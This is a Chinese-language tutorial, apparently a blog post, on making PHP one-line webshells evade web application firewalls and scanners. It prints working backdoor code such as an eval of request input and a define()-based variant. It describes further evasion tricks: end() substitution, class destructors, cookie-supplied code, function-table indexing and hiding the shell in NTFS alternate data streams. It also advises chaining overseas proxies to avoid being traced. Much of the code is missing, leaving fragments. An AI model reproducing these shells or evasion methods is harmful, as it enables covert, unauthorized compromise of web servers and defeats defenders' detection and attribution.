waf绕过下

上篇说的是
bapass SQL绕过

这篇说的是“webshell绕过”

演示一句话木马
然后菜刀连接。
可以用某狗来扫描一下，发现马。

如果放了webshell，担心因为请求的原因被查到ip，那我们可以多挂几层代理。
（在海外跳3、4次，基本查不到）

加入我们写入了webshell，但是被waf拦截了

我们这篇，就是来说怎么来绕waf（防火墙）

waf拦截我们，她的检测机制不单单是一些特定字符，而是特定字符组合起来
像我们的一句话木马

<?php eval($_REQUEST['a']);?>

不会拦截eval，也不会拦截$_REQUEST[]
而是要他们组合起来 eval($_REQUEST[]),才会拦截

而REQUEST只是一个数组。

而我们不在REQUEST后面加上中括号，就不会拦截，那我们有没有其他东西代替这个中括号的东西呢

但是eval里面执行的东西，必须是个字符串，不能是个数组，
那可以用end函数来代替中括号，


然后我们一执行，发现居然绕过了waf。

这个时候，waf就扫不出来了

常见的webshell方法。

绕过其一

<?php define("a","$_REQUEST[a]");eval(a);?>

绕过其二

waf还是没有扫描出来

绕过其三

绕过其四

最前面是一个类，里面的方法是执行完就销毁，
把name的值赋值给变量this
新建一个类叫变量user
然后name的值为$_REQUEST[1]。再把name的值赋值给变量this，最后执行这个函数

扫描一下，未发现风险

正常执行

绕过其五

没有拦截

cookie设置值

成功绕过waf

绕过其六

<?php 
$a=get_defined_functions();
var_dump($a);
?>

get_defined_functions()这个函数返回一个叫internal的函数，
这个internal的函数的函数包含所有的php函数，然后有1364个

我们根据上面的提示，internal的这个函数，里面有键值，0对应zend_version函数

那我们就输出internal函数里的第0个函数

<?php 
$a=get_defined_functions();
var_dump($a[internal][0]);
?>

成功输出

写入shell

执行成功

题外话，绕D盾

被D盾拦截

我们价格if判断就绕过了

而我们要做的就是改下请求头

然后一样的出来了

番外

用NTFS文件流隐写

回到目录，啥也看不出来

然后我们再用一个php文件，去包含这个一句话木马文件。

但是这种方法，只能window使用，linux不行

这种方法dir也查不出来。

终极绕过waf方法

D盾没有拦截

从结果集中取一行

info表的info字段（键）

选中键（字段）

执行成功